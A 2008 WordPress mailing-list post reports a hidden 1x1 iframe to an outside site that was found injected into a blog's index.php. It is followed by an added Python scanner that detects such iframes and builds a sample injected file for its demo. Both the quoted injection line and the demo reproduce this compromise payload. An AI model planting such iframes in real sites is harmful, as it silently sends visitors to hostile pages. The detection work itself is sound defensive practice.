[wp-hackers] XSS vuln in wordpress 2.7 ?
madalin
niladam at gmail.com
Mon Dec 22 17:27:21 GMT 2008
Hello,
For some reason I found my blog's index.php (not theme's index.php)
with the following piece of code right before the ?>
echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
I tried looking at the logs. No luck. The file's permissions look like this:
-rw-r--r-- 1 madalin madalin 557 Dec 22 15:50 /home/madalin/www/index.php
I'm still trying to figure out how that line got there. I've
downloaded wordpress right from wordpress.org, and the server is a
dedicated one, only two users with shell access to it.
Any suggestions ?
--
Regards,
madalin
http://madalin.eu
http://www.tg-jiu.ro
http://www.radioomega.ro
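
An added example, not part of the original post: one way to check a web root for the kind of injected line quoted above, by flagging .php files that contain an iframe hidden through a 1-pixel size or CSS. The function names, the regexes and the sample files (including the injected.example host) are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# An <iframe> tag counts as hidden when it has a 0/1 pixel dimension or
# hiding CSS. Quotes may be backslash-escaped because the tag sits in a PHP string.
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
HIDDEN = re.compile(
    r"""(?:width|height)\s*=\s*\\?["']?[01]\b"""
    r"""|visibility\s*:\s*hidden|display\s*:\s*none""", re.I)
SRC = re.compile(r"""src\s*=\s*\\?["']?([^\s"'\\>]+)""", re.I)


def find_hidden_iframes(text):
    """Return the src of every hidden iframe tag found in text."""
    hits = []
    for tag in IFRAME.findall(text):
        if HIDDEN.search(tag):
            m = SRC.search(tag)
            hits.append(m.group(1) if m else "")
    return hits


def scan_tree(root):
    """Map each .php file under root that holds a hidden iframe to its srcs."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = find_hidden_iframes(path.read_text(errors="replace"))
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report


def demo():
    """Scan a constructed two-file tree: one injected file, one clean file."""
    injected = ('<?php\nrequire("./wp-blog-header.php");\n'
                'echo "<iframe src=\\"http://injected.example/?click=1\\" width=1\n'
                'height=1 style=\\"visibility:hidden;position:absolute\\"></iframe>";\n?>')
    clean = '<?php echo "<iframe src=\\"/map\\" width=600 height=400></iframe>"; ?>'
    with tempfile.TemporaryDirectory() as d:
        Path(d, "index.php").write_text(injected)
        Path(d, "page.php").write_text(clean)
        return scan_tree(d)


if __name__ == "__main__":
    for name, srcs in demo().items():
        print(name, srcs)
```

Pointing `scan_tree` at the real document root lists every file to compare against a fresh copy from wordpress.org; a hit only shows where the line was written, not how it got there.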